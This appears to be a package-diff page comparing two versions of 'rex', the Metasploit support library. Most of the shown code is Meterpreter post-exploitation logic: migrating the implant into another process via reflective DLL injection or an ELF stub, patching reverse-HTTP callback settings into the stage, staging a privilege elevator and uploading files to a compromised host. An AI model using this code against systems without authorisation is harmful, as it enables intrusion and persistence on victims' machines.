rex 2.0.5 → 2.0.7
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- data/lib/rex/exploitation/egghunter.rb +4 -6
- data/lib/rex/exploitation/powershell/psh_methods.rb +9 -0
- data/lib/rex/java/serialization.rb +2 -1
- data/lib/rex/java/serialization/builder.rb +94 -0
- data/lib/rex/java/serialization/model.rb +29 -18
- data/lib/rex/java/serialization/model/annotation.rb +2 -2
- data/lib/rex/java/serialization/model/field.rb +2 -2
- data/lib/rex/java/serialization/model/new_array.rb +8 -3
- data/lib/rex/java/serialization/model/new_class_desc.rb +3 -3
- data/lib/rex/java/serialization/model/new_enum.rb +4 -4
- data/lib/rex/java/serialization/model/new_object.rb +17 -10
- data/lib/rex/ole/direntry.rb +1 -1
- data/lib/rex/ole/samples/create_ole.rb +0 -0
- data/lib/rex/ole/samples/dir.rb +0 -0
- data/lib/rex/ole/samples/dump_stream.rb +0 -0
- data/lib/rex/ole/samples/ole_info.rb +0 -0
- data/lib/rex/parser/foundstone_nokogiri.rb +1 -1
- data/lib/rex/parser/fs/ntfs.rb +252 -0
- data/lib/rex/parser/openvas_nokogiri.rb +2 -0
- data/lib/rex/payloads/win32/kernel.rb +3 -3
- data/lib/rex/post/meterpreter/client_core.rb +172 -64
- data/lib/rex/post/meterpreter/extensions/priv/priv.rb +3 -2
- data/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +12 -10
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb +64 -37
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb +8 -2
- data/lib/rex/post/meterpreter/extensions/stdapi/ui.rb +15 -3
- data/lib/rex/post/meterpreter/packet.rb +41 -38
- data/lib/rex/post/meterpreter/packet_dispatcher.rb +7 -1
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +17 -4
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb +11 -4
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb +1 -1
- data/lib/rex/proto.rb +2 -0
- data/lib/rex/proto/acpp.rb +17 -0
- data/lib/rex/proto/acpp/client.rb +29 -0
- data/lib/rex/proto/acpp/message.rb +183 -0
- data/lib/rex/proto/http/client.rb +1 -2
- data/lib/rex/proto/iax2/call.rb +22 -3
- data/lib/rex/proto/iax2/client.rb +1 -0
- data/lib/rex/proto/kerberos.rb +13 -0
- data/lib/rex/proto/kerberos/client.rb +213 -0
- data/lib/rex/proto/kerberos/credential_cache.rb +19 -0
- data/lib/rex/proto/kerberos/credential_cache/cache.rb +81 -0
- data/lib/rex/proto/kerberos/credential_cache/credential.rb +151 -0
- data/lib/rex/proto/kerberos/credential_cache/element.rb +49 -0
- data/lib/rex/proto/kerberos/credential_cache/key_block.rb +62 -0
- data/lib/rex/proto/kerberos/credential_cache/principal.rb +70 -0
- data/lib/rex/proto/kerberos/credential_cache/time.rb +69 -0
- data/lib/rex/proto/kerberos/crypto.rb +21 -0
- data/lib/rex/proto/kerberos/crypto/rc4_hmac.rb +65 -0
- data/lib/rex/proto/kerberos/crypto/rsa_md5.rb +15 -0
- data/lib/rex/proto/kerberos/model.rb +133 -0
- data/lib/rex/proto/kerberos/model/ap_req.rb +98 -0
- data/lib/rex/proto/kerberos/model/authenticator.rb +143 -0
- data/lib/rex/proto/kerberos/model/authorization_data.rb +85 -0
- data/lib/rex/proto/kerberos/model/checksum.rb +59 -0
- data/lib/rex/proto/kerberos/model/element.rb +67 -0
- data/lib/rex/proto/kerberos/model/enc_kdc_response.rb +215 -0
- data/lib/rex/proto/kerberos/model/encrypted_data.rb +171 -0
- data/lib/rex/proto/kerberos/model/encryption_key.rb +106 -0
- data/lib/rex/proto/kerberos/model/kdc_request.rb +166 -0
- data/lib/rex/proto/kerberos/model/kdc_request_body.rb +315 -0
- data/lib/rex/proto/kerberos/model/kdc_response.rb +141 -0
- data/lib/rex/proto/kerberos/model/krb_error.rb +219 -0
- data/lib/rex/proto/kerberos/model/last_request.rb +82 -0
- data/lib/rex/proto/kerberos/model/pre_auth_data.rb +104 -0
- data/lib/rex/proto/kerberos/model/pre_auth_enc_time_stamp.rb +126 -0
- data/lib/rex/proto/kerberos/model/pre_auth_pac_request.rb +81 -0
- data/lib/rex/proto/kerberos/model/principal_name.rb +116 -0
- data/lib/rex/proto/kerberos/model/ticket.rb +151 -0
- data/lib/rex/proto/kerberos/pac.rb +36 -0
- data/lib/rex/proto/kerberos/pac/client_info.rb +53 -0
- data/lib/rex/proto/kerberos/pac/element.rb +52 -0
- data/lib/rex/proto/kerberos/pac/logon_info.rb +566 -0
- data/lib/rex/proto/kerberos/pac/priv_svr_checksum.rb +29 -0
- data/lib/rex/proto/kerberos/pac/server_checksum.rb +30 -0
- data/lib/rex/proto/kerberos/pac/type.rb +121 -0
- data/lib/rex/proto/rmi.rb +7 -0
- data/lib/rex/proto/rmi/model.rb +31 -0
- data/lib/rex/proto/rmi/model/call.rb +60 -0
- data/lib/rex/proto/rmi/model/continuation.rb +76 -0
- data/lib/rex/proto/rmi/model/dgc_ack.rb +62 -0
- data/lib/rex/proto/rmi/model/element.rb +143 -0
- data/lib/rex/proto/rmi/model/output_header.rb +86 -0
- data/lib/rex/proto/rmi/model/ping.rb +41 -0
- data/lib/rex/proto/rmi/model/ping_ack.rb +41 -0
- data/lib/rex/proto/rmi/model/protocol_ack.rb +100 -0
- data/lib/rex/proto/rmi/model/return_data.rb +60 -0
- data/lib/rex/socket.rb +9 -1
- data/lib/rex/socket/tcp_server.rb +3 -0
- data/lib/rex/ui/text/dispatcher_shell.rb +4 -4
- data/lib/rex/ui/text/output/tee.rb +2 -0
- data/lib/rex/zip/samples/comment.rb +0 -0
- data/lib/rex/zip/samples/mkwar.rb +0 -0
- data/lib/rex/zip/samples/mkzip.rb +0 -0
- data/lib/rex/zip/samples/recursive.rb +0 -0
- data/rex.gemspec +1 -1
- metadata +56 -2
@@ -24,7 +24,7 @@ module Kernel
|
|
24
24
|
payload = nil
|
25
25
|
|
26
26
|
# Generate the recovery stub
|
27
|
-
if opts['Recovery'] and Kernel::Recovery.respond_to?(opts['Recovery'])
|
27
|
+
if opts['Recovery'] and Kernel::Recovery.respond_to?(opts['Recovery'], true)
|
28
28
|
opts['RecoveryStub'] = Kernel::Recovery.send(opts['Recovery'], opts)
|
29
29
|
end
|
30
30
|
|
@@ -35,10 +35,10 @@ module Kernel
|
|
35
35
|
end
|
36
36
|
|
37
37
|
# Generate the stager
|
38
|
-
if opts['Stager'] and Kernel::Stager.respond_to?(opts['Stager'])
|
38
|
+
if opts['Stager'] and Kernel::Stager.respond_to?(opts['Stager'], true)
|
39
39
|
payload = Kernel::Stager.send(opts['Stager'], opts)
|
40
40
|
# Or, generate the migrator
|
41
|
-
elsif opts['Migrator'] and Kernel::Migration.respond_to?(opts['Migrator'])
|
41
|
+
elsif opts['Migrator'] and Kernel::Migration.respond_to?(opts['Migrator'], true)
|
42
42
|
payload = Kernel::Migration.send(opts['Migrator'], opts)
|
43
43
|
else
|
44
44
|
raise ArgumentError, "A stager or a migrator must be specified."
|
@@ -25,6 +25,9 @@ module Meterpreter
|
|
25
25
|
###
|
26
26
|
class ClientCore < Extension
|
27
27
|
|
28
|
+
UNIX_PATH_MAX = 108
|
29
|
+
DEFAULT_SOCK_PATH = "/tmp/meterpreter.sock"
|
30
|
+
|
28
31
|
#
|
29
32
|
# Initializes the 'core' portion of the meterpreter client commands.
|
30
33
|
#
|
@@ -68,18 +71,18 @@ class ClientCore < Extension
|
|
68
71
|
load_flags = LOAD_LIBRARY_FLAG_LOCAL
|
69
72
|
|
70
73
|
# No library path, no cookie.
|
71
|
-
if
|
74
|
+
if library_path.nil?
|
72
75
|
raise ArgumentError, "No library file path was supplied", caller
|
73
76
|
end
|
74
77
|
|
75
78
|
# Set up the proper loading flags
|
76
|
-
if
|
79
|
+
if opts['UploadLibrary']
|
77
80
|
load_flags &= ~LOAD_LIBRARY_FLAG_LOCAL
|
78
81
|
end
|
79
|
-
if
|
82
|
+
if opts['SaveToDisk']
|
80
83
|
load_flags |= LOAD_LIBRARY_FLAG_ON_DISK
|
81
84
|
end
|
82
|
-
if
|
85
|
+
if opts['Extension']
|
83
86
|
load_flags |= LOAD_LIBRARY_FLAG_EXTENSION
|
84
87
|
end
|
85
88
|
|
@@ -87,14 +90,14 @@ class ClientCore < Extension
|
|
87
90
|
request = Packet.create_request('core_loadlib')
|
88
91
|
|
89
92
|
# If we must upload the library, do so now
|
90
|
-
if (
|
93
|
+
if (load_flags & LOAD_LIBRARY_FLAG_LOCAL) != LOAD_LIBRARY_FLAG_LOCAL
|
91
94
|
image = ''
|
92
95
|
|
93
96
|
::File.open(library_path, 'rb') { |f|
|
94
97
|
image = f.read
|
95
98
|
}
|
96
99
|
|
97
|
-
if
|
100
|
+
if !image.nil?
|
98
101
|
request.add_tlv(TLV_TYPE_DATA, image, false, client.capabilities[:zlib])
|
99
102
|
else
|
100
103
|
raise RuntimeError, "Failed to serialize library #{library_path}.", caller
|
@@ -103,7 +106,7 @@ class ClientCore < Extension
|
|
103
106
|
# If it's an extension we're dealing with, rename the library
|
104
107
|
# path of the local and target so that it gets loaded with a random
|
105
108
|
# name
|
106
|
-
if
|
109
|
+
if opts['Extension']
|
107
110
|
library_path = "ext" + rand(1000000).to_s + ".#{client.binary_suffix}"
|
108
111
|
target_path = library_path
|
109
112
|
end
|
@@ -113,7 +116,7 @@ class ClientCore < Extension
|
|
113
116
|
request.add_tlv(TLV_TYPE_LIBRARY_PATH, library_path)
|
114
117
|
request.add_tlv(TLV_TYPE_FLAGS, load_flags)
|
115
118
|
|
116
|
-
if
|
119
|
+
if !target_path.nil?
|
117
120
|
request.add_tlv(TLV_TYPE_TARGET_PATH, target_path)
|
118
121
|
end
|
119
122
|
|
@@ -121,9 +124,9 @@ class ClientCore < Extension
|
|
121
124
|
response = self.client.send_packet_wait_response(request, self.client.response_timeout)
|
122
125
|
|
123
126
|
# No response?
|
124
|
-
if
|
127
|
+
if response.nil?
|
125
128
|
raise RuntimeError, "No response was received to the core_loadlib request.", caller
|
126
|
-
elsif
|
129
|
+
elsif response.result != 0
|
127
130
|
raise RuntimeError, "The core_loadlib request failed with result: #{response.result}.", caller
|
128
131
|
end
|
129
132
|
|
@@ -147,7 +150,7 @@ class ClientCore < Extension
|
|
147
150
|
# memory on the remote machine
|
148
151
|
#
|
149
152
|
def use(mod, opts = { })
|
150
|
-
if
|
153
|
+
if mod.nil?
|
151
154
|
raise RuntimeError, "No modules were specified", caller
|
152
155
|
end
|
153
156
|
# Get us to the installation root and then into data/meterpreter, where
|
@@ -155,11 +158,13 @@ class ClientCore < Extension
|
|
155
158
|
modname = "ext_server_#{mod.downcase}"
|
156
159
|
path = MeterpreterBinaries.path(modname, client.binary_suffix)
|
157
160
|
|
158
|
-
if
|
159
|
-
path = opts['ExtensionPath']
|
161
|
+
if opts['ExtensionPath']
|
162
|
+
path = ::File.expand_path(opts['ExtensionPath'])
|
160
163
|
end
|
161
164
|
|
162
|
-
path
|
165
|
+
if path.nil?
|
166
|
+
raise RuntimeError, "No module of the name #{modname}.#{client.binary_suffix} found", caller
|
167
|
+
end
|
163
168
|
|
164
169
|
# Load the extension DLL
|
165
170
|
commands = load_library(
|
@@ -176,84 +181,86 @@ class ClientCore < Extension
|
|
176
181
|
# Migrates the meterpreter instance to the process specified
|
177
182
|
# by pid. The connection to the server remains established.
|
178
183
|
#
|
179
|
-
def migrate(
|
184
|
+
def migrate(pid, writable_dir = nil)
|
180
185
|
keepalive = client.send_keepalives
|
181
186
|
client.send_keepalives = false
|
182
187
|
process = nil
|
183
188
|
binary_suffix = nil
|
189
|
+
old_platform = client.platform
|
190
|
+
old_binary_suffix = client.binary_suffix
|
184
191
|
|
185
192
|
# Load in the stdapi extension if not allready present so we can determine the target pid architecture...
|
186
193
|
client.core.use( "stdapi" ) if not client.ext.aliases.include?( "stdapi" )
|
187
194
|
|
188
195
|
# Determine the architecture for the pid we are going to migrate into...
|
189
196
|
client.sys.process.processes.each { | p |
|
190
|
-
if
|
197
|
+
if p['pid'] == pid
|
191
198
|
process = p
|
192
199
|
break
|
193
200
|
end
|
194
201
|
}
|
195
202
|
|
196
203
|
# We cant migrate into a process that does not exist.
|
197
|
-
if
|
204
|
+
if process.nil?
|
198
205
|
raise RuntimeError, "Cannot migrate into non existent process", caller
|
199
206
|
end
|
200
207
|
|
201
|
-
# We
|
202
|
-
|
203
|
-
|
208
|
+
# We cannot migrate into a process that we are unable to open
|
209
|
+
# On linux, arch is empty even if we can access the process
|
210
|
+
if client.platform =~ /win/
|
211
|
+
if process['arch'] == nil || process['arch'].empty?
|
212
|
+
raise RuntimeError, "Cannot migrate into this process (insufficient privileges)", caller
|
213
|
+
end
|
204
214
|
end
|
205
215
|
|
206
|
-
# And we also
|
207
|
-
if
|
216
|
+
# And we also cannot migrate into our own current process...
|
217
|
+
if process['pid'] == client.sys.process.getpid
|
208
218
|
raise RuntimeError, "Cannot migrate into current process", caller
|
209
219
|
end
|
210
220
|
|
211
|
-
|
212
|
-
|
213
|
-
|
221
|
+
if client.platform =~ /linux/
|
222
|
+
if writable_dir.blank?
|
223
|
+
writable_dir = tmp_folder
|
224
|
+
end
|
214
225
|
|
215
|
-
|
216
|
-
|
217
|
-
|
218
|
-
|
219
|
-
|
220
|
-
|
221
|
-
binary_suffix = "x64.dll"
|
222
|
-
else
|
223
|
-
raise RuntimeError, "Unsupported target architecture '#{process['arch']}' for process '#{process['name']}'.", caller
|
226
|
+
stat_dir = client.fs.filestat.new(writable_dir)
|
227
|
+
|
228
|
+
unless stat_dir.directory?
|
229
|
+
raise RuntimeError, "Directory #{writable_dir} not found", caller
|
230
|
+
end
|
231
|
+
# Rex::Post::FileStat#writable? isn't available
|
224
232
|
end
|
225
233
|
|
226
|
-
|
227
|
-
migrate_stager = c.new()
|
228
|
-
migrate_stager.datastore['DLL'] = MeterpreterBinaries.path('metsrv',binary_suffix)
|
234
|
+
blob = generate_payload_stub(process)
|
229
235
|
|
230
|
-
|
236
|
+
# Build the migration request
|
237
|
+
request = Packet.create_request( 'core_migrate' )
|
231
238
|
|
232
|
-
if client.
|
239
|
+
if client.platform =~ /linux/i
|
240
|
+
socket_path = File.join(writable_dir, Rex::Text.rand_text_alpha_lower(5 + rand(5)))
|
233
241
|
|
234
|
-
|
235
|
-
|
236
|
-
|
237
|
-
|
238
|
-
|
239
|
-
|
240
|
-
|
241
|
-
|
242
|
-
|
243
|
-
:proxyhost => client.exploit_datastore['PROXYHOST'],
|
244
|
-
:proxyport => client.exploit_datastore['PROXYPORT'],
|
245
|
-
:proxy_type => client.exploit_datastore['PROXY_TYPE'],
|
246
|
-
:proxy_username => client.exploit_datastore['PROXY_USERNAME'],
|
247
|
-
:proxy_password => client.exploit_datastore['PROXY_PASSWORD']
|
242
|
+
if socket_path.length > UNIX_PATH_MAX - 1
|
243
|
+
raise RuntimeError, "The writable dir is too long", caller
|
244
|
+
end
|
245
|
+
|
246
|
+
pos = blob.index(DEFAULT_SOCK_PATH)
|
247
|
+
|
248
|
+
if pos.nil?
|
249
|
+
raise RuntimeError, "The meterpreter binary is wrong", caller
|
250
|
+
end
|
248
251
|
|
252
|
+
blob[pos, socket_path.length + 1] = socket_path + "\x00"
|
253
|
+
|
254
|
+
ep = elf_ep(blob)
|
255
|
+
request.add_tlv(TLV_TYPE_MIGRATE_BASE_ADDR, 0x20040000)
|
256
|
+
request.add_tlv(TLV_TYPE_MIGRATE_ENTRY_POINT, ep)
|
257
|
+
request.add_tlv(TLV_TYPE_MIGRATE_SOCKET_PATH, socket_path, false, client.capabilities[:zlib])
|
249
258
|
end
|
250
259
|
|
251
|
-
# Build the migration request
|
252
|
-
request = Packet.create_request( 'core_migrate' )
|
253
260
|
request.add_tlv( TLV_TYPE_MIGRATE_PID, pid )
|
254
261
|
request.add_tlv( TLV_TYPE_MIGRATE_LEN, blob.length )
|
255
262
|
request.add_tlv( TLV_TYPE_MIGRATE_PAYLOAD, blob, false, client.capabilities[:zlib])
|
256
|
-
if
|
263
|
+
if process['arch'] == ARCH_X86_64
|
257
264
|
request.add_tlv( TLV_TYPE_MIGRATE_ARCH, 2 ) # PROCESS_ARCH_X64
|
258
265
|
else
|
259
266
|
request.add_tlv( TLV_TYPE_MIGRATE_ARCH, 1 ) # PROCESS_ARCH_X86
|
@@ -298,15 +305,28 @@ class ClientCore < Extension
|
|
298
305
|
end
|
299
306
|
end
|
300
307
|
|
301
|
-
# Update the meterpreter platform/suffix for loading extensions as we may
|
302
|
-
#
|
303
|
-
#
|
304
|
-
|
305
|
-
|
306
|
-
|
308
|
+
# Update the meterpreter platform/suffix for loading extensions as we may
|
309
|
+
# have changed target architecture
|
310
|
+
# sf: this is kinda hacky but it works. As ruby doesnt let you un-include a
|
311
|
+
# module this is the simplest solution I could think of. If the platform
|
312
|
+
# specific modules Meterpreter_x64_Win/Meterpreter_x86_Win change
|
313
|
+
# significantly we will need a better way to do this.
|
314
|
+
|
315
|
+
case client.platform
|
316
|
+
when /win/i
|
317
|
+
if process['arch'] == ARCH_X86_64
|
318
|
+
client.platform = 'x64/win64'
|
319
|
+
client.binary_suffix = 'x64.dll'
|
320
|
+
else
|
321
|
+
client.platform = 'x86/win32'
|
322
|
+
client.binary_suffix = 'x86.dll'
|
323
|
+
end
|
324
|
+
when /linux/i
|
325
|
+
client.platform = 'x86/linux'
|
326
|
+
client.binary_suffix = 'lso'
|
307
327
|
else
|
308
|
-
client.platform
|
309
|
-
client.binary_suffix
|
328
|
+
client.platform = old_platform
|
329
|
+
client.binary_suffix = old_binary_suffix
|
310
330
|
end
|
311
331
|
|
312
332
|
# Load all the extensions that were loaded in the previous instance (using the correct platform/binary_suffix)
|
@@ -339,6 +359,94 @@ class ClientCore < Extension
|
|
339
359
|
true
|
340
360
|
end
|
341
361
|
|
362
|
+
private
|
363
|
+
|
364
|
+
def generate_payload_stub(process)
|
365
|
+
case client.platform
|
366
|
+
when /win/i
|
367
|
+
blob = generate_windows_stub(process)
|
368
|
+
when /linux/i
|
369
|
+
blob = generate_linux_stub
|
370
|
+
else
|
371
|
+
raise RuntimeError, "Unsupported platform '#{client.platform}'"
|
372
|
+
end
|
373
|
+
|
374
|
+
blob
|
375
|
+
end
|
376
|
+
|
377
|
+
def generate_windows_stub(process)
|
378
|
+
c = Class.new( ::Msf::Payload )
|
379
|
+
c.include( ::Msf::Payload::Stager )
|
380
|
+
|
381
|
+
# Include the appropriate reflective dll injection module for the target process architecture...
|
382
|
+
if process['arch'] == ARCH_X86
|
383
|
+
c.include( ::Msf::Payload::Windows::ReflectiveDllInject )
|
384
|
+
binary_suffix = "x86.dll"
|
385
|
+
elsif process['arch'] == ARCH_X86_64
|
386
|
+
c.include( ::Msf::Payload::Windows::ReflectiveDllInject_x64 )
|
387
|
+
binary_suffix = "x64.dll"
|
388
|
+
else
|
389
|
+
raise RuntimeError, "Unsupported target architecture '#{process['arch']}' for process '#{process['name']}'.", caller
|
390
|
+
end
|
391
|
+
|
392
|
+
# Create the migrate stager
|
393
|
+
migrate_stager = c.new()
|
394
|
+
|
395
|
+
dll = MeterpreterBinaries.path('metsrv',binary_suffix)
|
396
|
+
if dll.nil?
|
397
|
+
raise RuntimeError, "metsrv.#{binary_suffix} not found", caller
|
398
|
+
end
|
399
|
+
migrate_stager.datastore['DLL'] = dll
|
400
|
+
|
401
|
+
blob = migrate_stager.stage_payload
|
402
|
+
|
403
|
+
if client.passive_service
|
404
|
+
|
405
|
+
#
|
406
|
+
# Patch options into metsrv for reverse HTTP payloads
|
407
|
+
#
|
408
|
+
Rex::Payloads::Meterpreter::Patch.patch_passive_service! blob,
|
409
|
+
:ssl => client.ssl,
|
410
|
+
:url => self.client.url,
|
411
|
+
:expiration => self.client.expiration,
|
412
|
+
:comm_timeout => self.client.comm_timeout,
|
413
|
+
:ua => client.exploit_datastore['MeterpreterUserAgent'],
|
414
|
+
:proxyhost => client.exploit_datastore['PROXYHOST'],
|
415
|
+
:proxyport => client.exploit_datastore['PROXYPORT'],
|
416
|
+
:proxy_type => client.exploit_datastore['PROXY_TYPE'],
|
417
|
+
:proxy_username => client.exploit_datastore['PROXY_USERNAME'],
|
418
|
+
:proxy_password => client.exploit_datastore['PROXY_PASSWORD']
|
419
|
+
|
420
|
+
end
|
421
|
+
|
422
|
+
blob
|
423
|
+
end
|
424
|
+
|
425
|
+
def generate_linux_stub
|
426
|
+
file = ::File.join(Msf::Config.data_directory, "meterpreter", "msflinker_linux_x86.bin")
|
427
|
+
blob = ::File.open(file, "rb") {|f|
|
428
|
+
f.read(f.stat.size)
|
429
|
+
}
|
430
|
+
|
431
|
+
blob
|
432
|
+
end
|
433
|
+
|
434
|
+
def elf_ep(payload)
|
435
|
+
elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) )
|
436
|
+
ep = elf.elf_header.e_entry
|
437
|
+
return ep
|
438
|
+
end
|
439
|
+
|
440
|
+
def tmp_folder
|
441
|
+
tmp = client.sys.config.getenv('TMPDIR')
|
442
|
+
|
443
|
+
if tmp.blank?
|
444
|
+
tmp = '/tmp'
|
445
|
+
end
|
446
|
+
|
447
|
+
tmp
|
448
|
+
end
|
449
|
+
|
342
450
|
end
|
343
451
|
|
344
452
|
end; end; end
|
@@ -46,8 +46,9 @@ class Priv < Extension
|
|
46
46
|
elevator_name = Rex::Text.rand_text_alpha_lower( 6 )
|
47
47
|
|
48
48
|
elevator_path = MeterpreterBinaries.path('elevator', client.binary_suffix)
|
49
|
-
|
50
|
-
|
49
|
+
if elevator_path.nil?
|
50
|
+
raise RuntimeError, "elevator.#{binary_suffix} not found", caller
|
51
|
+
end
|
51
52
|
|
52
53
|
elevator_data = ""
|
53
54
|
|
@@ -203,10 +203,10 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
|
|
203
203
|
alias delete rm
|
204
204
|
end
|
205
205
|
|
206
|
-
|
207
|
-
|
208
|
-
|
209
|
-
|
206
|
+
#
|
207
|
+
# Performs a rename from oldname to newname
|
208
|
+
#
|
209
|
+
def File.mv(oldname, newname)
|
210
210
|
request = Packet.create_request('stdapi_fs_file_move')
|
211
211
|
|
212
212
|
request.add_tlv(TLV_TYPE_FILE_NAME, client.unicode_filter_decode( oldname ))
|
@@ -215,12 +215,12 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
|
|
215
215
|
response = client.send_request(request)
|
216
216
|
|
217
217
|
return response
|
218
|
-
|
218
|
+
end
|
219
219
|
|
220
|
-
|
221
|
-
|
222
|
-
|
223
|
-
|
220
|
+
class << self
|
221
|
+
alias move mv
|
222
|
+
alias rename mv
|
223
|
+
end
|
224
224
|
|
225
225
|
#
|
226
226
|
# Upload one or more files to the remote remote directory supplied in
|
@@ -246,9 +246,10 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
|
|
246
246
|
#
|
247
247
|
# Upload a single file.
|
248
248
|
#
|
249
|
-
def File.upload_file(dest_file, src_file)
|
249
|
+
def File.upload_file(dest_file, src_file, &stat)
|
250
250
|
# Open the file on the remote side for writing and read
|
251
251
|
# all of the contents of the local file
|
252
|
+
stat.call('uploading', src_file, dest_file) if (stat)
|
252
253
|
dest_fd = client.fs.file.new(dest_file, "wb")
|
253
254
|
src_buf = ''
|
254
255
|
|
@@ -261,6 +262,7 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
|
|
261
262
|
ensure
|
262
263
|
dest_fd.close
|
263
264
|
end
|
265
|
+
stat.call('uploaded', src_file, dest_file) if (stat)
|
264
266
|
end
|
265
267
|
|
266
268
|
#
|